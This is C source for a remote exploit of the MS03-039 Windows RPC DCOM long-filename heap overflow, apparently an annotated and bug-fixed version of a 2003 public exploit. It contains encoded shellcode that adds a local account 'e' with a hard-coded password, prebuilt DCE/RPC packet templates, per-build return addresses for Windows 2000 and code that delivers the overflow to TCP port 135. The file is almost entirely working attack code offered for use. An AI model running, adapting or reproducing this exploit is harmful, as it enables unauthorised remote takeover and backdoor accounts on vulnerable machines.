
/*
 Translated from the original (GBK-encoded) Chinese header:

 The technique used here is to overwrite TopLevelExceptionFilter and then
 reach the payload through a `call [ebp+74]`. For the detailed technical
 description see:
 http://www.immunitysec.com/papers/msrpcheap.pdf
 http://www.immunitysec.com/papers/msrpcheap2.pdf

 Thanks to flashsky & benjurry & Dave Aitel (in no particular order ^_^)

 This exploit is far from universal. Usually you `pskill rpcss` first and then
 run it; if the version/target parameter is right it should mostly succeed.
 On success it adds an account (user "e", see the banner in main()).
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* winsock2.h must be included before windows.h (which otherwise drags in winsock.h) */
#include <winsock2.h>
#include <windows.h>
#include <winbase.h>
#include <process.h>

#pragma comment(lib,"ws2_32")
  20.  
/*
 * DCE/RPC bind PDU, sent verbatim as the first message.
 *   byte 0-3   rpc_vers 5, minor 0, ptype 0x0B (bind), pfc_flags 0x03 (first|last)
 *   byte 4-7   data representation 0x10 0x00 0x00 0x00 (little-endian NDR)
 *   byte 8-9   frag_length 0x48 = 72 = sizeof(bindstr)
 *   byte 12-15 call_id 0x7f
 *   then max_xmit/max_recv 0x16d0, assoc_group 0, one presentation context:
 *   abstract syntax 000001a0-0000-0000-c000-000000000046 v0.0 (ISystemActivator)
 *   with transfer syntax 8a885d04-1ceb-11c9-9fe8-08002b104860 v2 (NDR).
 * main() only checks that the reply is non-empty; a bind_nak would also
 * satisfy that, so a stricter caller should look at the reply's ptype byte.
 */
unsigned char bindstr[]={
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};
  27.  
/*
 * Template for the DCE/RPC request PDU (864 bytes) that precedes the long
 * filename.  Header: ptype 0x00 (request), pfc_flags 0x03, call_id 0xe5,
 * context id 1, opnum 4 (bytes 22-23).  The fields main() bumps by
 * sizeof(sc)-0xc after splicing the filename in are:
 *   0x08  frag_length (initially 0x3e8) -- NOTE this is a 16-bit field
 *         followed by the 16-bit auth_length; the 32-bit add in main() is
 *         only correct while the total stays below 0x10000, which the
 *         0x1000-byte send buffer guarantees.
 *   0x10  alloc_hint (initially 0x3d0)
 *   0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c  length fields inside the
 *         marshalled activation request (not decoded here).
 * The "MEOW" (0x4d 0x45 0x4f 0x57) sequences are OBJREF signatures; the
 * 0xCCCCCCCC-prefixed sub-blocks recur in request4 as well.
 */
unsigned char request1[]={
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
,0x00,0x00,0x00,0x00,0x00,0x00};
  84.  
/*
 * NDR header of the conformant/varying UTF-16 filename that follows request1:
 *   +0  max count   (0x20 = 32 chars in the template)
 *   +4  offset      (0)
 *   +8  actual count (0x20)
 *   +12 first two characters, "\\" (0x5c 0x00 twice)
 * main() adds sizeof(sc)/2 (the number of UTF-16 units in `sc`) to both
 * counts; 32 is the length of "\\" plus the request3 tail including its NUL.
 */
unsigned char request2[]={
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
,0x00,0x00,0x5C,0x00,0x5C,0x00};
  88.  
/*
 * UTF-16 tail of the filename, appended after `sc`:
 *   "\C$\123456" + fifteen '1' characters + ".doc" + NUL  (30 UTF-16 units)
 * Together with request2 and `sc` the complete string reads
 * "\\127.0.0.1\IPC$\<filler+shellcode>\C$\123456111111111111111.doc".
 */
unsigned char request3[]={
0x5C,0x00
,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};
  95.  
/*
 * Payload (318 bytes + NUL). Per the banner printed by main() it adds local
 * user "e" with password "asd#321"; main() copies it, NUL included, into
 * `sc` at sc_offset.
 *
 * The first 23 bytes read as a self-decoding stub (x86-32):
 *   EB 10                 jmp short +0x10
 *   5A / 4A               pop edx ; dec edx   (edx -> byte before the body)
 *   33 C9 / 66 B9 3E 01   ecx = 0x13e
 *   80 34 0A 99           xor byte ptr [edx+ecx], 0x99
 *   E2 FA                 loop
 *   EB 05 / E8 EB FF FF FF   jmp over a call that pushes the body address
 * followed by the XOR-0x99-encoded body.
 *
 * NOTE(review): the loop counter 0x13e equals the whole array length, not
 * the ~295 body bytes after the stub, so the decoder appears to also XOR a
 * couple of dozen bytes past the end of this array -- once inside `sc`
 * that is the 'E' filler region. Confirm with a disassembly before changing
 * sc_offset or the filler layout.
 */
//user="e" pass="asd#321"
unsigned char sc_add_user[]=
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3E\x01\x80\x34\x0A\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x31\x99\x99\x99\xC3\x21\x95\x69"
"\x64\xE6\x12\x99\x12\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5"
"\x9A\x6A\x12\xEF\xE1\x9A\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA"
"\x74\xCF\xCE\xC8\x12\xA6\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED"
"\x91\xC0\xC6\x1A\x5E\x9D\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF"
"\xBD\x9A\x5A\x48\x78\x9A\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A"
"\x5A\x58\x78\x9B\x9A\x58\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F"
"\x97\x12\x49\xF3\x9A\xC0\x71\xBD\x99\x99\x99\xF1\x66\x66\x66\x99"
"\xF1\x99\x89\x99\x99\xF3\x9D\x66\xCE\x6D\x22\x81\x69\x64\xE6\x10"
"\x9A\x1A\x5F\x95\xAA\x59\xC9\xCF\x66\xCE\x61\xC9\x66\xCE\x65\xAA"
"\x59\x35\x1C\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B"
"\x77\xAA\x59\x5A\x71\xCA\x66\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA"
"\xD8\xFD\xFD\xEB\xFC\xEA\xEA\x99\xD1\xFC\xF8\xE9\xDA\xEB\xFC\xF8"
"\xED\xFC\x99\xCE\xF0\xF7\xDC\xE1\xFC\xFA\x99\xDC\xE1\xF0\xED\xC9"
"\xEB\xF6\xFA\xFC\xEA\xEA\x99\xFA\xF4\xFD\xB9\xB6\xFA\xB9\xF7\xFC"
"\xED\xB9\xEC\xEA\xFC\xEB\xB9\xFC\xB9\xF8\xEA\xFD\xBA\xAA\xAB\xA8"
"\xB9\xB6\xF8\xFD\xFD\xB9\xBF\xBF\xB9\xF7\xFC\xED\xB9\xF5\xF6\xFA"
"\xF8\xF5\xFE\xEB\xF6\xEC\xE9\xB9\xF8\xFD\xF4\xF0\xF7\xF0\xEA\xED"
"\xEB\xF8\xED\xF6\xEB\xEA\xB9\xFC\xB9\xB6\xF8\xFD\xFD\x99";
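/*
 * Byte offsets inside the `sc` buffer (see `sc` below and main()):
 *   sc_offset        0x24  - where sc_add_user is copied
 *   sc_max           0x208 - largest payload main() accepts
 *   jmp_addr_offset  0x234 - 4-byte value taken from targets[].dwJmpAddr
 *   top_seh_offset   0x238 - 4-byte value taken from targets[].dwTopSeh
 * The relative jmp baked into `sc` sits at sc_max+sc_offset (0x22c), eight
 * bytes before jmp_addr_offset, and lands back on sc_offset.
 * The derived macros are fully parenthesised: the originals expanded to a
 * bare sum, which silently mis-evaluates inside any higher-precedence
 * expression (e.g. `2*jmp_addr_offset`).
 */
#define    sc_offset        0x24
#define    sc_max            0x208
#define    jmp_addr_offset    ((sc_max) + (sc_offset) + 0x8)
#define    top_seh_offset    ((jmp_addr_offset) + 0x4)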
  122.  
/*
 * Middle part of the long filename (sizeof(sc) == 0x25c, NUL included).
 * Byte layout, all offsets relative to sc[0]:
 *   0x000-0x01d  UTF-16 "127.0.0.1\IPC$\" (15 units)
 *   0x01e-0x22b  0x45 'E' filler (`inc ebp` on 32-bit x86, harmless as a
 *                sled); main() copies sc_add_user over 0x024.. (sc_offset)
 *   0x22c        E9 F3 FD FF FF = jmp rel32 -0x20d; next IP 0x231 - 0x20d
 *                = 0x024, i.e. back to the start of sc_add_user
 *   0x231-0x25a  more 'E' filler, of which main() overwrites
 *                0x234..0x237 with targets[].dwJmpAddr and
 *                0x238..0x23b with targets[].dwTopSeh
 *   0x25b        NUL terminator from the string literal (copied as data)
 * Since sc has an odd number of characters (0x25b), the NUL pairs with the
 * last 'E' to make a whole UTF-16 unit; main() counts sizeof(sc)/2 units.
 */
unsigned char sc[]=
"\x31\x00\x32\x00\x37\x00\x2e\x00\x30\x00\x2e\x00"   /* "127.0." */
"\x30\x00\x2e\x00\x31\x00\x5c\x00\x49\x00\x50\x00"   /* "0.1\IP" */
"\x43\x00\x24\x00\x5c\x00"                           /* "C$\"    */
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE"
"\xe9\xf3\xfd\xff\xff"                               /* jmp back to sc_offset */
"EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE";       /* holds the two patched addresses */
  140.  
/*
 * Trailing 48 bytes of the request PDU, appended after request3. Starts
 * with the same 0x00010008 / 0xCCCCCCCC sub-block header that recurs in
 * request1; the remaining fields are not decoded here and are sent as-is
 * (none of the offsets main() patches fall inside this part).
 */
unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};
  147.  
/*
 * Per-target address table. main() patches two of these values into `sc`:
 *   dwTopSeh  -> written at top_seh_offset; per the file header this is
 *                what ends up overwriting TopLevelExceptionFilter (address
 *                taken from the kernel32.dll build named in `seh`).
 *   dwJmpAddr -> written at jmp_addr_offset; per the file header a
 *                `call [ebp+74]`-style gadget in the OLEAUT32.dll build
 *                named in `jmp`.
 * The `seh` / `jmp` strings are only used by the usage text. The addresses
 * are hard-coded module offsets and are only valid for exactly those DLL
 * builds; any other build needs a new entry (and that is why the header
 * calls the exploit "far from universal").
 * `v` is a dummy instance that exists solely so main() can write
 * sizeof(targets)/sizeof(v) for the element count.
 */
struct
{
    char    *os;         /* label shown in the usage listing */
    DWORD    dwTopSeh;
    char    *seh;        /* where dwTopSeh was taken from */
    DWORD    dwJmpAddr;
    char    *jmp;        /* where dwJmpAddr was taken from */
}
targets[] =
{
    { "2kEnSp4+MS03-026", 
        0x7c54144c,
        "kernel32.dll v5.0.2195.6688",
        0x77a1b496,
        "OLEAUT32.dll v2.40.4522.0"},
    { "2kEnSp3+SomeHotFixs+MS03-026", 
        0x77eda1f0,
        "kernel32.dll v5.0.2195.6079",
        0x77a1afa9,
        "OLEAUT32.dll v2.40.4518.0"}
}, v;
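/* Store a 32-bit value little-endian into a byte buffer (the wire order the
 * PDUs use). Going byte by byte avoids the unaligned, aliasing-violating
 * `*(DWORD *)buf` stores of the original. */
static void put_le32(unsigned char *p, unsigned long v)
{
    p[0] = (unsigned char)(v & 0xff);
    p[1] = (unsigned char)((v >> 8) & 0xff);
    p[2] = (unsigned char)((v >> 16) & 0xff);
    p[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Read a little-endian 32-bit value from a byte buffer. */
static unsigned long get_le32(const unsigned char *p)
{
    return (unsigned long)p[0]
         | ((unsigned long)p[1] << 8)
         | ((unsigned long)p[2] << 16)
         | ((unsigned long)p[3] << 24);
}

/* Add `delta` to the little-endian 32-bit field at `p` (used for the
 * length fields that grow once the long filename is spliced in). */
static void add_le32(unsigned char *p, unsigned long delta)
{
    put_le32(p, get_le32(p) + delta);
}

/* send() until the whole buffer is out. Returns 0 on success, -1 when the
 * socket fails or closes; a single send() may legitimately write less than
 * requested on a stream socket. */
static int send_all(SOCKET s, const unsigned char *buf, int len)
{
    int done = 0;

    while (done < len) {
        int n = send(s, (const char *)buf + done, len - done, 0);
        if (n <= 0)
            return -1;
        done += n;
    }
    return 0;
}

/*
 * Entry point: <target IP> <type index into targets[]>.
 *
 * Flow: validate arguments, patch the payload and the per-target addresses
 * into `sc`, assemble bind + request PDUs, send the bind, require a reply,
 * send the request and report. Returns 0 when the final recv() fails (which
 * the original treats as "target crashed or exploit succeeded"), 1 otherwise.
 *
 * Fixes relative to the original:
 *  - `iType > count` accepted index == count, reading one past targets[];
 *    the bound is now `>=` and the number is parsed with strtoul so junk
 *    like "1x" is rejected instead of silently becoming 1.
 *  - the sc_max length check ran *after* the memcpy into sc; it now runs
 *    before, and the patch offsets are checked against sizeof(sc).
 *  - the assembled request is size-checked against its stack buffer.
 *  - inet_addr() failure (INADDR_NONE) is reported instead of connecting
 *    to 255.255.255.255.
 *  - the bind reply must be a bind_ack (ptype 0x0C); a bind_nak also
 *    produces a non-empty reply and would make the final verdict meaningless.
 *  - socket and WSA state are released on every path (goto cleanup).
 *  - length patching goes through put/get_le32 instead of DWORD casts, and
 *    the global request2 template is left untouched (a local copy is patched).
 */
int main(int argc, char **argv)
{
    WSADATA wsa;
    SOCKET sock = INVALID_SOCKET;
    SOCKADDR_IN addr_in;
    const unsigned short port = 135;
    unsigned char reply[0x1000];
    unsigned char pdu[0x1000];
    unsigned char fname_hdr[sizeof(request2)];
    /* offsets inside request1 whose 32-bit length fields grow with the
     * filename; 0x8 is really frag_length(16)+auth_length(16), which only
     * works because the total can never exceed sizeof(pdu) < 0x10000 */
    static const size_t len_fields[] = { 0x8, 0x10, 0x80, 0x84, 0xb4, 0xb8, 0xd0, 0x18c };
    const size_t ntargets = sizeof(targets) / sizeof(targets[0]);
    const unsigned long wide_extra = sizeof(sc) / 2;     /* UTF-16 units added */
    const unsigned long byte_extra = sizeof(sc) - 0xc;   /* bytes added to the PDU */
    size_t total, pdu_len, i;
    unsigned long target_idx;
    char *end;
    int n, rc = 1;

    printf( "MS03-039 RPC DCOM long filename heap buffer overflow exp v1\n"
            "Base on flashsky's MS03-026 exp\n"
            "Code by ey4s<eyas#xfocus.org>\n"
            "2003-09-16\n"
            "Welcome to http://www.xfocus.net\n"
            "Thanks to flashsky & benjurry & Dave Aitel\n"
            "If success, target will add a user \"e\" and password is \"asd#321\"\n\n");

    if (argc != 3) {
        printf("Usage: %s <target> <type>\n", argv[0]);
        for (i = 0; i < ntargets; i++)
            printf( "<%d>   %s\n"
                    "      TopSeh=0x%.8x in %s\n"
                    "      JmpAddr=0x%.8x in %s\n",
                    (int)i, targets[i].os,
                    (unsigned)targets[i].dwTopSeh, targets[i].seh,
                    (unsigned)targets[i].dwJmpAddr, targets[i].jmp);
        return 1;
    }

    /* strtoul: "-1" wraps to ULONG_MAX and is caught by the range test,
     * trailing garbage is caught by *end */
    errno = 0;
    target_idx = strtoul(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || target_idx >= ntargets) {
        printf("[-] Wrong type.\n");
        return 1;
    }

    /* bounds first, then patch `sc` */
    if (sizeof(sc_add_user) > sc_max) {
        printf("[-] shellcode too long, exit.\n");
        return 1;
    }
    if (sc_offset + sizeof(sc_add_user) > sizeof(sc) || top_seh_offset + 4 > sizeof(sc)) {
        printf("[-] sc buffer too small for the payload layout, exit.\n");
        return 1;
    }
    memcpy(&sc[sc_offset], sc_add_user, sizeof(sc_add_user));
    put_le32(&sc[jmp_addr_offset], targets[target_idx].dwJmpAddr);
    put_le32(&sc[top_seh_offset], targets[target_idx].dwTopSeh);
    printf("[+] Prepare shellcode completed.\n");

    /* assemble request1 | fname_hdr | sc | request3 | request4 */
    total = sizeof(request1) + sizeof(request2) + sizeof(sc)
          + sizeof(request3) + sizeof(request4);
    if (total > sizeof(pdu)) {
        printf("[-] request (%d bytes) does not fit the send buffer, exit.\n", (int)total);
        return 1;
    }

    /* patch a copy of request2: max count (+0) and actual count (+8) of the
     * UTF-16 filename grow by the number of units in `sc` */
    memcpy(fname_hdr, request2, sizeof(fname_hdr));
    add_le32(fname_hdr, wide_extra);
    add_le32(fname_hdr + 8, wide_extra);

    pdu_len = 0;
    memcpy(pdu + pdu_len, request1, sizeof(request1));   pdu_len += sizeof(request1);
    memcpy(pdu + pdu_len, fname_hdr, sizeof(fname_hdr)); pdu_len += sizeof(fname_hdr);
    memcpy(pdu + pdu_len, sc, sizeof(sc));               pdu_len += sizeof(sc);
    memcpy(pdu + pdu_len, request3, sizeof(request3));   pdu_len += sizeof(request3);
    memcpy(pdu + pdu_len, request4, sizeof(request4));   pdu_len += sizeof(request4);

    /* grow every embedded length field by the bytes the filename added */
    for (i = 0; i < sizeof(len_fields) / sizeof(len_fields[0]); i++) {
        if (len_fields[i] + 4 > sizeof(request1)) {
            printf("[-] length field offset 0x%x outside request1, exit.\n", (unsigned)len_fields[i]);
            return 1;
        }
        add_le32(pdu + len_fields[i], byte_extra);
    }

    if (WSAStartup(MAKEWORD(2, 0), &wsa) != 0) {
        printf("WSAStartup error.Error:%d\n", WSAGetLastError());
        return 1;
    }

    memset(&addr_in, 0, sizeof(addr_in));
    addr_in.sin_family = AF_INET;
    addr_in.sin_port = htons(port);
    addr_in.sin_addr.S_un.S_addr = inet_addr(argv[1]);
    if (addr_in.sin_addr.S_un.S_addr == INADDR_NONE) {
        printf("[-] Invalid target address: %s\n", argv[1]);
        goto cleanup;
    }

    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock == INVALID_SOCKET) {
        printf("Socket failed.Error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    if (connect(sock, (struct sockaddr *)&addr_in, sizeof(addr_in)) == SOCKET_ERROR) {
        printf("Connect failed.Error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("[+] Connect to %s:135 success.\n", argv[1]);

    if (send_all(sock, bindstr, (int)sizeof(bindstr)) != 0) {
        printf("[-] Send failed.Error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("[+] send %d bytes.\n", (int)sizeof(bindstr));

    n = recv(sock, (char *)reply, sizeof(reply), 0);
    if (n <= 0) {
        printf("[-] recv error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("[+] recv %d bytes.\n", n);
    /* byte 2 of a DCE/RPC PDU is its type: 0x0C bind_ack, 0x0D bind_nak */
    if (n < 3 || reply[2] != 0x0C) {
        printf("[-] bind not accepted (ptype 0x%02x), exit.\n", n < 3 ? 0xff : reply[2]);
        goto cleanup;
    }

    if (send_all(sock, pdu, (int)pdu_len) != 0) {
        printf("[-] Send failed.Error:%d\n", WSAGetLastError());
        goto cleanup;
    }
    printf("[+] send %d bytes.\n", (int)pdu_len);

    /* the original heuristic: a dropped connection is taken as a crash of
     * rpcss (or the payload running); any reply means it was handled */
    n = recv(sock, (char *)reply, sizeof(reply), 0);
    if (n <= 0) {
        printf("[+] Target crash or exploit success? :)\n");
        rc = 0;
    } else {
        printf("[-] recv %d bytes. Bad luck!\n", n);
        rc = 1;
    }

cleanup:
    if (sock != INVALID_SOCKET)
        closesocket(sock);
    WSACleanup();
    return rc;
}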